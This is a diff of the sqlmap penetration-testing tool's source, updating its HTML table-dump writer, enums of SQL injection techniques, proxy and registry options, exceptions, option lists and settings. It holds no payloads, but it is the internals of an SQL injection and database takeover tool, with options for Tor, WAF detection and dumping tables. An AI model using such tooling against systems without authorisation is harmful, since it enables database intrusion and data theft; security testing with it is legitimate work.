dataToDumpFile(dumpFP, "%s%s" % (safeCSValue(column), conf.csvDel))
|
||||||
elif conf.dumpFormat == DUMP_FORMAT.HTML:
|
elif conf.dumpFormat == DUMP_FORMAT.HTML:
|
||||||
entryNode = documentNode.createElement("td")
|
dataToDumpFile(dumpFP, "<th>%s</th>" % cgi.escape(column).encode("ascii", "xmlcharrefreplace"))
|
||||||
rowNode.appendChild(entryNode)
|
|
||||||
entryNode.appendChild(documentNode.createTextNode(column))
|
|
||||||
|
|
||||||
field += 1
|
field += 1
|
||||||
|
|
||||||
|
if conf.dumpFormat == DUMP_FORMAT.HTML:
|
||||||
|
dataToDumpFile(dumpFP, "\n</tr>\n</thead>\n<tbody>\n")
|
||||||
|
|
||||||
self._write("|\n%s" % separator)
|
self._write("|\n%s" % separator)
|
||||||
|
|
||||||
if conf.dumpFormat == DUMP_FORMAT.CSV:
|
if conf.dumpFormat == DUMP_FORMAT.CSV:
|
||||||
|
@ -503,8 +552,7 @@ class Dump(object):
|
||||||
values = []
|
values = []
|
||||||
|
|
||||||
if conf.dumpFormat == DUMP_FORMAT.HTML:
|
if conf.dumpFormat == DUMP_FORMAT.HTML:
|
||||||
rowNode = documentNode.createElement("tr")
|
dataToDumpFile(dumpFP, "<tr>")
|
||||||
bodyNode.appendChild(rowNode)
|
|
||||||
|
|
||||||
for column in columns:
|
for column in columns:
|
||||||
if column != "__infos__":
|
if column != "__infos__":
|
||||||
|
@ -525,18 +573,21 @@ class Dump(object):
|
||||||
self._write("| %s%s" % (value, blank), newline=False, console=console)
|
self._write("| %s%s" % (value, blank), newline=False, console=console)
|
||||||
|
|
||||||
if len(value) > MIN_BINARY_DISK_DUMP_SIZE and r'\x' in value:
|
if len(value) > MIN_BINARY_DISK_DUMP_SIZE and r'\x' in value:
|
||||||
mimetype = magic.from_buffer(value, mime=True)
|
try:
|
||||||
if any(mimetype.startswith(_) for _ in ("application", "image")):
|
mimetype = magic.from_buffer(value, mime=True)
|
||||||
if not os.path.isdir(dumpDbPath):
|
if any(mimetype.startswith(_) for _ in ("application", "image")):
|
||||||
os.makedirs(dumpDbPath, 0755)
|
if not os.path.isdir(dumpDbPath):
|
||||||
|
os.makedirs(dumpDbPath, 0755)
|
||||||
|
|
||||||
filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (unsafeSQLIdentificatorNaming(column), randomInt(8)))
|
filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (unsafeSQLIdentificatorNaming(column), randomInt(8)))
|
||||||
warnMsg = "writing binary ('%s') content to file '%s' " % (mimetype, filepath)
|
warnMsg = "writing binary ('%s') content to file '%s' " % (mimetype, filepath)
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
with open(filepath, "wb") as f:
|
with open(filepath, "wb") as f:
|
||||||
_ = safechardecode(value, True)
|
_ = safechardecode(value, True)
|
||||||
f.write(_)
|
f.write(_)
|
||||||
|
except magic.MagicException, err:
|
||||||
|
logger.debug(str(err))
|
||||||
|
|
||||||
if conf.dumpFormat == DUMP_FORMAT.CSV:
|
if conf.dumpFormat == DUMP_FORMAT.CSV:
|
||||||
if field == fields:
|
if field == fields:
|
||||||
|
@ -544,9 +595,7 @@ class Dump(object):
|
||||||
else:
|
else:
|
||||||
dataToDumpFile(dumpFP, "%s%s" % (safeCSValue(value), conf.csvDel))
|
dataToDumpFile(dumpFP, "%s%s" % (safeCSValue(value), conf.csvDel))
|
||||||
elif conf.dumpFormat == DUMP_FORMAT.HTML:
|
elif conf.dumpFormat == DUMP_FORMAT.HTML:
|
||||||
entryNode = documentNode.createElement("td")
|
dataToDumpFile(dumpFP, "<td>%s</td>" % cgi.escape(value).encode("ascii", "xmlcharrefreplace"))
|
||||||
rowNode.appendChild(entryNode)
|
|
||||||
entryNode.appendChild(documentNode.createTextNode(value))
|
|
||||||
|
|
||||||
field += 1
|
field += 1
|
||||||
|
|
||||||
|
@ -557,6 +606,8 @@ class Dump(object):
|
||||||
pass
|
pass
|
||||||
elif conf.dumpFormat == DUMP_FORMAT.CSV:
|
elif conf.dumpFormat == DUMP_FORMAT.CSV:
|
||||||
dataToDumpFile(dumpFP, "\n")
|
dataToDumpFile(dumpFP, "\n")
|
||||||
|
elif conf.dumpFormat == DUMP_FORMAT.HTML:
|
||||||
|
dataToDumpFile(dumpFP, "</tr>\n")
|
||||||
|
|
||||||
self._write("|", console=console)
|
self._write("|", console=console)
|
||||||
|
|
||||||
|
@ -568,17 +619,16 @@ class Dump(object):
|
||||||
|
|
||||||
elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):
|
elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):
|
||||||
if conf.dumpFormat == DUMP_FORMAT.HTML:
|
if conf.dumpFormat == DUMP_FORMAT.HTML:
|
||||||
dataToDumpFile(dumpFP, "<!DOCTYPE html>\n<html>\n<head>\n")
|
dataToDumpFile(dumpFP, "</tbody>\n</table>\n</body>\n</html>")
|
||||||
dataToDumpFile(dumpFP, "<meta http-equiv=\"Content-type\" content=\"text/html;charset=%s\">\n" % UNICODE_ENCODING)
|
|
||||||
dataToDumpFile(dumpFP, "<title>%s</title>\n" % ("%s%s" % ("%s." % db if METADB_SUFFIX not in db else "", table)))
|
|
||||||
dataToDumpFile(dumpFP, HTML_DUMP_CSS_STYLE)
|
|
||||||
dataToDumpFile(dumpFP, "\n</head>\n")
|
|
||||||
dataToDumpFile(dumpFP, tableNode.toxml())
|
|
||||||
dataToDumpFile(dumpFP, "\n</html>")
|
|
||||||
else:
|
else:
|
||||||
dataToDumpFile(dumpFP, "\n")
|
dataToDumpFile(dumpFP, "\n")
|
||||||
dumpFP.close()
|
dumpFP.close()
|
||||||
logger.info("table '%s.%s' dumped to %s file '%s'" % (db, table, conf.dumpFormat, dumpFileName))
|
|
||||||
|
msg = "table '%s.%s' dumped to %s file '%s'" % (db, table, conf.dumpFormat, dumpFileName)
|
||||||
|
if not warnFile:
|
||||||
|
logger.info(msg)
|
||||||
|
else:
|
||||||
|
logger.warn(msg)
|
||||||
|
|
||||||
def dbColumns(self, dbColumnsDict, colConsider, dbs):
|
def dbColumns(self, dbColumnsDict, colConsider, dbs):
|
||||||
if hasattr(conf, "api"):
|
if hasattr(conf, "api"):
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -71,8 +71,10 @@ class PLACE:
|
||||||
class POST_HINT:
|
class POST_HINT:
|
||||||
SOAP = "SOAP"
|
SOAP = "SOAP"
|
||||||
JSON = "JSON"
|
JSON = "JSON"
|
||||||
|
JSON_LIKE = "JSON-like"
|
||||||
MULTIPART = "MULTIPART"
|
MULTIPART = "MULTIPART"
|
||||||
XML = "XML (generic)"
|
XML = "XML (generic)"
|
||||||
|
ARRAY_LIKE = "Array-like"
|
||||||
|
|
||||||
class HTTPMETHOD:
|
class HTTPMETHOD:
|
||||||
GET = "GET"
|
GET = "GET"
|
||||||
|
@ -135,9 +137,15 @@ class MOBILES:
|
||||||
|
|
||||||
class PROXY_TYPE:
|
class PROXY_TYPE:
|
||||||
HTTP = "HTTP"
|
HTTP = "HTTP"
|
||||||
|
HTTPS = "HTTPS"
|
||||||
SOCKS4 = "SOCKS4"
|
SOCKS4 = "SOCKS4"
|
||||||
SOCKS5 = "SOCKS5"
|
SOCKS5 = "SOCKS5"
|
||||||
|
|
||||||
|
class REGISTRY_OPERATION:
|
||||||
|
READ = "read"
|
||||||
|
ADD = "add"
|
||||||
|
DELETE = "delete"
|
||||||
|
|
||||||
class DUMP_FORMAT:
|
class DUMP_FORMAT:
|
||||||
CSV = "CSV"
|
CSV = "CSV"
|
||||||
HTML = "HTML"
|
HTML = "HTML"
|
||||||
|
@ -158,6 +166,7 @@ class HTTP_HEADER:
|
||||||
COOKIE = "Cookie"
|
COOKIE = "Cookie"
|
||||||
SET_COOKIE = "Set-Cookie"
|
SET_COOKIE = "Set-Cookie"
|
||||||
HOST = "Host"
|
HOST = "Host"
|
||||||
|
LOCATION = "Location"
|
||||||
PRAGMA = "Pragma"
|
PRAGMA = "Pragma"
|
||||||
PROXY_AUTHORIZATION = "Proxy-Authorization"
|
PROXY_AUTHORIZATION = "Proxy-Authorization"
|
||||||
PROXY_CONNECTION = "Proxy-Connection"
|
PROXY_CONNECTION = "Proxy-Connection"
|
||||||
|
@ -166,12 +175,19 @@ class HTTP_HEADER:
|
||||||
SERVER = "Server"
|
SERVER = "Server"
|
||||||
USER_AGENT = "User-Agent"
|
USER_AGENT = "User-Agent"
|
||||||
TRANSFER_ENCODING = "Transfer-Encoding"
|
TRANSFER_ENCODING = "Transfer-Encoding"
|
||||||
|
URI = "URI"
|
||||||
VIA = "Via"
|
VIA = "Via"
|
||||||
|
|
||||||
class EXPECTED:
|
class EXPECTED:
|
||||||
BOOL = "bool"
|
BOOL = "bool"
|
||||||
INT = "int"
|
INT = "int"
|
||||||
|
|
||||||
|
class OPTION_TYPE:
|
||||||
|
BOOLEAN = "boolean"
|
||||||
|
INTEGER = "integer"
|
||||||
|
FLOAT = "float"
|
||||||
|
STRING = "string"
|
||||||
|
|
||||||
class HASHDB_KEYS:
|
class HASHDB_KEYS:
|
||||||
DBMS = "DBMS"
|
DBMS = "DBMS"
|
||||||
CONF_TMP_PATH = "CONF_TMP_PATH"
|
CONF_TMP_PATH = "CONF_TMP_PATH"
|
||||||
|
@ -192,10 +208,10 @@ class PAYLOAD:
|
||||||
SQLINJECTION = {
|
SQLINJECTION = {
|
||||||
1: "boolean-based blind",
|
1: "boolean-based blind",
|
||||||
2: "error-based",
|
2: "error-based",
|
||||||
3: "UNION query",
|
3: "inline query",
|
||||||
4: "stacked queries",
|
4: "stacked queries",
|
||||||
5: "AND/OR time-based blind",
|
5: "AND/OR time-based blind",
|
||||||
6: "inline query",
|
6: "UNION query",
|
||||||
}
|
}
|
||||||
|
|
||||||
PARAMETER = {
|
PARAMETER = {
|
||||||
|
@ -234,10 +250,10 @@ class PAYLOAD:
|
||||||
class TECHNIQUE:
|
class TECHNIQUE:
|
||||||
BOOLEAN = 1
|
BOOLEAN = 1
|
||||||
ERROR = 2
|
ERROR = 2
|
||||||
UNION = 3
|
QUERY = 3
|
||||||
STACKED = 4
|
STACKED = 4
|
||||||
TIME = 5
|
TIME = 5
|
||||||
QUERY = 6
|
UNION = 6
|
||||||
|
|
||||||
class WHERE:
|
class WHERE:
|
||||||
ORIGINAL = 1
|
ORIGINAL = 1
|
||||||
|
@ -323,4 +339,9 @@ class AUTH_TYPE:
|
||||||
BASIC = "basic"
|
BASIC = "basic"
|
||||||
DIGEST = "digest"
|
DIGEST = "digest"
|
||||||
NTLM = "ntlm"
|
NTLM = "ntlm"
|
||||||
CERT = "cert"
|
PKI = "pki"
|
||||||
|
|
||||||
|
class AUTOCOMPLETE_TYPE:
|
||||||
|
SQL = 0
|
||||||
|
OS = 1
|
||||||
|
SQLMAP = 2
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -23,6 +23,9 @@ class SqlmapFilePathException(SqlmapBaseException):
|
||||||
class SqlmapGenericException(SqlmapBaseException):
|
class SqlmapGenericException(SqlmapBaseException):
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
class SqlmapInstallationException(SqlmapBaseException):
|
||||||
|
pass
|
||||||
|
|
||||||
class SqlmapMissingDependence(SqlmapBaseException):
|
class SqlmapMissingDependence(SqlmapBaseException):
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
@ -44,12 +47,21 @@ class SqlmapSilentQuitException(SqlmapBaseException):
|
||||||
class SqlmapUserQuitException(SqlmapBaseException):
|
class SqlmapUserQuitException(SqlmapBaseException):
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
class SqlmapShellQuitException(SqlmapBaseException):
|
||||||
|
pass
|
||||||
|
|
||||||
class SqlmapSyntaxException(SqlmapBaseException):
|
class SqlmapSyntaxException(SqlmapBaseException):
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
class SqlmapSystemException(SqlmapBaseException):
|
||||||
|
pass
|
||||||
|
|
||||||
class SqlmapThreadException(SqlmapBaseException):
|
class SqlmapThreadException(SqlmapBaseException):
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
class SqlmapTokenException(SqlmapBaseException):
|
||||||
|
pass
|
||||||
|
|
||||||
class SqlmapUndefinedMethod(SqlmapBaseException):
|
class SqlmapUndefinedMethod(SqlmapBaseException):
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -41,4 +41,4 @@ FORMATTER = logging.Formatter("\r[%(asctime)s] [%(levelname)s] %(message)s", "%H
|
||||||
|
|
||||||
LOGGER_HANDLER.setFormatter(FORMATTER)
|
LOGGER_HANDLER.setFormatter(FORMATTER)
|
||||||
LOGGER.addHandler(LOGGER_HANDLER)
|
LOGGER.addHandler(LOGGER_HANDLER)
|
||||||
LOGGER.setLevel(logging.WARN)
|
LOGGER.setLevel(logging.INFO)
|
||||||
|
|
File diff suppressed because it is too large
Load Diff
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -19,12 +19,15 @@ optDict = {
|
||||||
"sessionFile": "string",
|
"sessionFile": "string",
|
||||||
"googleDork": "string",
|
"googleDork": "string",
|
||||||
"configFile": "string",
|
"configFile": "string",
|
||||||
|
"sitemapUrl": "string",
|
||||||
},
|
},
|
||||||
|
|
||||||
"Request": {
|
"Request": {
|
||||||
|
"method": "string",
|
||||||
"data": "string",
|
"data": "string",
|
||||||
"pDel": "string",
|
"paramDel": "string",
|
||||||
"cookie": "string",
|
"cookie": "string",
|
||||||
|
"cookieDel": "string",
|
||||||
"loadCookies": "string",
|
"loadCookies": "string",
|
||||||
"dropSetCookie": "boolean",
|
"dropSetCookie": "boolean",
|
||||||
"agent": "string",
|
"agent": "string",
|
||||||
|
@ -32,11 +35,12 @@ optDict = {
|
||||||
"host": "string",
|
"host": "string",
|
||||||
"referer": "string",
|
"referer": "string",
|
||||||
"headers": "string",
|
"headers": "string",
|
||||||
"aType": "string",
|
"authType": "string",
|
||||||
"aCred": "string",
|
"authCred": "string",
|
||||||
"aCert": "string",
|
"authPrivate": "string",
|
||||||
"proxy": "string",
|
"proxy": "string",
|
||||||
"pCred": "string",
|
"proxyCred": "string",
|
||||||
|
"proxyFile": "string",
|
||||||
"ignoreProxy": "boolean",
|
"ignoreProxy": "boolean",
|
||||||
"tor": "boolean",
|
"tor": "boolean",
|
||||||
"torPort": "integer",
|
"torPort": "integer",
|
||||||
|
@ -46,9 +50,13 @@ optDict = {
|
||||||
"timeout": "float",
|
"timeout": "float",
|
||||||
"retries": "integer",
|
"retries": "integer",
|
||||||
"rParam": "string",
|
"rParam": "string",
|
||||||
"safUrl": "string",
|
"safeUrl": "string",
|
||||||
"saFreq": "integer",
|
"safePost": "string",
|
||||||
|
"safeReqFile": "string",
|
||||||
|
"safeFreq": "integer",
|
||||||
"skipUrlEncode": "boolean",
|
"skipUrlEncode": "boolean",
|
||||||
|
"csrfToken": "string",
|
||||||
|
"csrfUrl": "string",
|
||||||
"forceSSL": "boolean",
|
"forceSSL": "boolean",
|
||||||
"hpp": "boolean",
|
"hpp": "boolean",
|
||||||
"evalCode": "string",
|
"evalCode": "string",
|
||||||
|
@ -65,11 +73,13 @@ optDict = {
|
||||||
"Injection": {
|
"Injection": {
|
||||||
"testParameter": "string",
|
"testParameter": "string",
|
||||||
"skip": "string",
|
"skip": "string",
|
||||||
|
"skipStatic": "boolean",
|
||||||
"dbms": "string",
|
"dbms": "string",
|
||||||
"dbmsCred": "string",
|
"dbmsCred": "string",
|
||||||
"os": "string",
|
"os": "string",
|
||||||
"invalidBignum": "boolean",
|
"invalidBignum": "boolean",
|
||||||
"invalidLogical": "boolean",
|
"invalidLogical": "boolean",
|
||||||
|
"invalidString": "boolean",
|
||||||
"noCast": "boolean",
|
"noCast": "boolean",
|
||||||
"noEscape": "boolean",
|
"noEscape": "boolean",
|
||||||
"prefix": "string",
|
"prefix": "string",
|
||||||
|
@ -121,9 +131,12 @@ optDict = {
|
||||||
"dumpTable": "boolean",
|
"dumpTable": "boolean",
|
||||||
"dumpAll": "boolean",
|
"dumpAll": "boolean",
|
||||||
"search": "boolean",
|
"search": "boolean",
|
||||||
|
"getComments": "boolean",
|
||||||
"db": "string",
|
"db": "string",
|
||||||
"tbl": "string",
|
"tbl": "string",
|
||||||
"col": "string",
|
"col": "string",
|
||||||
|
"excludeCol": "string",
|
||||||
|
"dumpWhere": "string",
|
||||||
"user": "string",
|
"user": "string",
|
||||||
"excludeSysDbs": "boolean",
|
"excludeSysDbs": "boolean",
|
||||||
"limitStart": "integer",
|
"limitStart": "integer",
|
||||||
|
@ -178,6 +191,7 @@ optDict = {
|
||||||
"batch": "boolean",
|
"batch": "boolean",
|
||||||
"charset": "string",
|
"charset": "string",
|
||||||
"crawlDepth": "integer",
|
"crawlDepth": "integer",
|
||||||
|
"crawlExclude": "string",
|
||||||
"csvDel": "string",
|
"csvDel": "string",
|
||||||
"dumpFormat": "string",
|
"dumpFormat": "string",
|
||||||
"eta": "boolean",
|
"eta": "boolean",
|
||||||
|
@ -185,7 +199,7 @@ optDict = {
|
||||||
"forms": "boolean",
|
"forms": "boolean",
|
||||||
"freshQueries": "boolean",
|
"freshQueries": "boolean",
|
||||||
"hexConvert": "boolean",
|
"hexConvert": "boolean",
|
||||||
"oDir": "string",
|
"outputDir": "string",
|
||||||
"parseErrors": "boolean",
|
"parseErrors": "boolean",
|
||||||
"pivotColumn": "string",
|
"pivotColumn": "string",
|
||||||
"saveCmdline": "boolean",
|
"saveCmdline": "boolean",
|
||||||
|
@ -199,7 +213,6 @@ optDict = {
|
||||||
"alert": "string",
|
"alert": "string",
|
||||||
"answers": "string",
|
"answers": "string",
|
||||||
"beep": "boolean",
|
"beep": "boolean",
|
||||||
"checkWaf": "boolean",
|
|
||||||
"cleanup": "boolean",
|
"cleanup": "boolean",
|
||||||
"dependencies": "boolean",
|
"dependencies": "boolean",
|
||||||
"disableColoring": "boolean",
|
"disableColoring": "boolean",
|
||||||
|
@ -218,6 +231,7 @@ optDict = {
|
||||||
"cpuThrottle": "integer",
|
"cpuThrottle": "integer",
|
||||||
"forceDns": "boolean",
|
"forceDns": "boolean",
|
||||||
"identifyWaf": "boolean",
|
"identifyWaf": "boolean",
|
||||||
|
"ignore401": "boolean",
|
||||||
"smokeTest": "boolean",
|
"smokeTest": "boolean",
|
||||||
"liveTest": "boolean",
|
"liveTest": "boolean",
|
||||||
"stopFail": "boolean",
|
"stopFail": "boolean",
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,15 +1,17 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import os
|
import os
|
||||||
|
import random
|
||||||
import re
|
import re
|
||||||
import subprocess
|
import subprocess
|
||||||
import string
|
import string
|
||||||
import sys
|
import sys
|
||||||
|
import time
|
||||||
|
|
||||||
from lib.core.enums import DBMS
|
from lib.core.enums import DBMS
|
||||||
from lib.core.enums import DBMS_DIRECTORY_NAME
|
from lib.core.enums import DBMS_DIRECTORY_NAME
|
||||||
|
@ -19,17 +21,28 @@ from lib.core.revision import getRevisionNumber
|
||||||
# sqlmap version and site
|
# sqlmap version and site
|
||||||
VERSION = "1.0-dev"
|
VERSION = "1.0-dev"
|
||||||
REVISION = getRevisionNumber()
|
REVISION = getRevisionNumber()
|
||||||
VERSION_STRING = "sqlmap/%s%s" % (VERSION, "-%s" % REVISION if REVISION else "")
|
VERSION_STRING = "sqlmap/%s%s" % (VERSION, "-%s" % REVISION if REVISION else "-nongit-%s" % time.strftime("%Y%m%d", time.gmtime(os.path.getctime(__file__))))
|
||||||
DESCRIPTION = "automatic SQL injection and database takeover tool"
|
DESCRIPTION = "automatic SQL injection and database takeover tool"
|
||||||
SITE = "http://sqlmap.org"
|
SITE = "http://sqlmap.org"
|
||||||
ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new"
|
ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new"
|
||||||
GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git"
|
GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git"
|
||||||
ML = "sqlmap-users@lists.sourceforge.net"
|
GIT_PAGE = "https://github.com/sqlmapproject/sqlmap"
|
||||||
|
|
||||||
|
# colorful banner
|
||||||
|
BANNER = """\033[01;33m _
|
||||||
|
___ ___| |_____ ___ ___ \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m
|
||||||
|
|_ -| . | | | .'| . |
|
||||||
|
|___|_ |_|_|_|_|__,| _|
|
||||||
|
|_| |_| \033[0m\033[4;37m%s\033[0m\n
|
||||||
|
""" % ((31 + hash(REVISION) % 6) if REVISION else 30, VERSION_STRING.split('/')[-1], SITE)
|
||||||
|
|
||||||
# Minimum distance of ratio from kb.matchRatio to result in True
|
# Minimum distance of ratio from kb.matchRatio to result in True
|
||||||
DIFF_TOLERANCE = 0.05
|
DIFF_TOLERANCE = 0.05
|
||||||
CONSTANT_RATIO = 0.9
|
CONSTANT_RATIO = 0.9
|
||||||
|
|
||||||
|
# Ratio used in heuristic check for WAF/IDS/IPS protected targets
|
||||||
|
IDS_WAF_CHECK_RATIO = 0.5
|
||||||
|
|
||||||
# Lower and upper values for match ratio in case of stable page
|
# Lower and upper values for match ratio in case of stable page
|
||||||
LOWER_RATIO_BOUND = 0.02
|
LOWER_RATIO_BOUND = 0.02
|
||||||
UPPER_RATIO_BOUND = 0.98
|
UPPER_RATIO_BOUND = 0.98
|
||||||
|
@ -37,31 +50,41 @@ UPPER_RATIO_BOUND = 0.98
|
||||||
# Markers for special cases when parameter values contain html encoded characters
|
# Markers for special cases when parameter values contain html encoded characters
|
||||||
PARAMETER_AMP_MARKER = "__AMP__"
|
PARAMETER_AMP_MARKER = "__AMP__"
|
||||||
PARAMETER_SEMICOLON_MARKER = "__SEMICOLON__"
|
PARAMETER_SEMICOLON_MARKER = "__SEMICOLON__"
|
||||||
|
BOUNDARY_BACKSLASH_MARKER = "__BACKSLASH__"
|
||||||
PARTIAL_VALUE_MARKER = "__PARTIAL_VALUE__"
|
PARTIAL_VALUE_MARKER = "__PARTIAL_VALUE__"
|
||||||
PARTIAL_HEX_VALUE_MARKER = "__PARTIAL_HEX_VALUE__"
|
PARTIAL_HEX_VALUE_MARKER = "__PARTIAL_HEX_VALUE__"
|
||||||
URI_QUESTION_MARKER = "__QUESTION_MARK__"
|
URI_QUESTION_MARKER = "__QUESTION_MARK__"
|
||||||
ASTERISK_MARKER = "__ASTERISK_MARK__"
|
ASTERISK_MARKER = "__ASTERISK_MARK__"
|
||||||
REPLACEMENT_MARKER = "__REPLACEMENT_MARK__"
|
REPLACEMENT_MARKER = "__REPLACEMENT_MARK__"
|
||||||
|
|
||||||
PAYLOAD_DELIMITER = "\x00"
|
PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__"
|
||||||
CHAR_INFERENCE_MARK = "%c"
|
CHAR_INFERENCE_MARK = "%c"
|
||||||
PRINTABLE_CHAR_REGEX = r"[^\x00-\x1f\x7f-\xff]"
|
PRINTABLE_CHAR_REGEX = r"[^\x00-\x1f\x7f-\xff]"
|
||||||
|
|
||||||
|
# Regular expression used for recognition of textual content-type
|
||||||
|
TEXT_CONTENT_TYPE_REGEX = r"(?i)(text|form|message|xml|javascript|ecmascript|json)"
|
||||||
|
|
||||||
# Regular expression used for recognition of generic permission messages
|
# Regular expression used for recognition of generic permission messages
|
||||||
PERMISSION_DENIED_REGEX = r"(command|permission|access)\s*(was|is)?\s*denied"
|
PERMISSION_DENIED_REGEX = r"(command|permission|access)\s*(was|is)?\s*denied"
|
||||||
|
|
||||||
# Regular expression used for recognition of generic maximum connection messages
|
# Regular expression used for recognition of generic maximum connection messages
|
||||||
MAX_CONNECTIONS_REGEX = r"max.+connections"
|
MAX_CONNECTIONS_REGEX = r"max.+connections"
|
||||||
|
|
||||||
# Regular expression used for extracting results from google search
|
# Regular expression used for extracting results from Google search
|
||||||
GOOGLE_REGEX = r"url\?\w+=((?![^>]+webcache\.googleusercontent\.com)http[^>]+)&(sa=U|rct=j)"
|
GOOGLE_REGEX = r"url\?\w+=((?![^>]+webcache\.googleusercontent\.com)http[^>]+)&(sa=U|rct=j)"
|
||||||
|
|
||||||
|
# Regular expression used for extracting results from DuckDuckGo search
|
||||||
|
DUCKDUCKGO_REGEX = r'"u":"([^"]+)'
|
||||||
|
|
||||||
# Regular expression used for extracting content from "textual" tags
|
# Regular expression used for extracting content from "textual" tags
|
||||||
TEXT_TAG_REGEX = r"(?si)<(abbr|acronym|b|blockquote|br|center|cite|code|dt|em|font|h\d|i|li|p|pre|q|strong|sub|sup|td|th|title|tt|u)(?!\w).*?>(?P<result>[^<]+)"
|
TEXT_TAG_REGEX = r"(?si)<(abbr|acronym|b|blockquote|br|center|cite|code|dt|em|font|h\d|i|li|p|pre|q|strong|sub|sup|td|th|title|tt|u)(?!\w).*?>(?P<result>[^<]+)"
|
||||||
|
|
||||||
# Regular expression used for recognition of IP addresses
|
# Regular expression used for recognition of IP addresses
|
||||||
IP_ADDRESS_REGEX = r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b"
|
IP_ADDRESS_REGEX = r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b"
|
||||||
|
|
||||||
|
# Regular expression used for recognition of generic "your ip has been blocked" messages
|
||||||
|
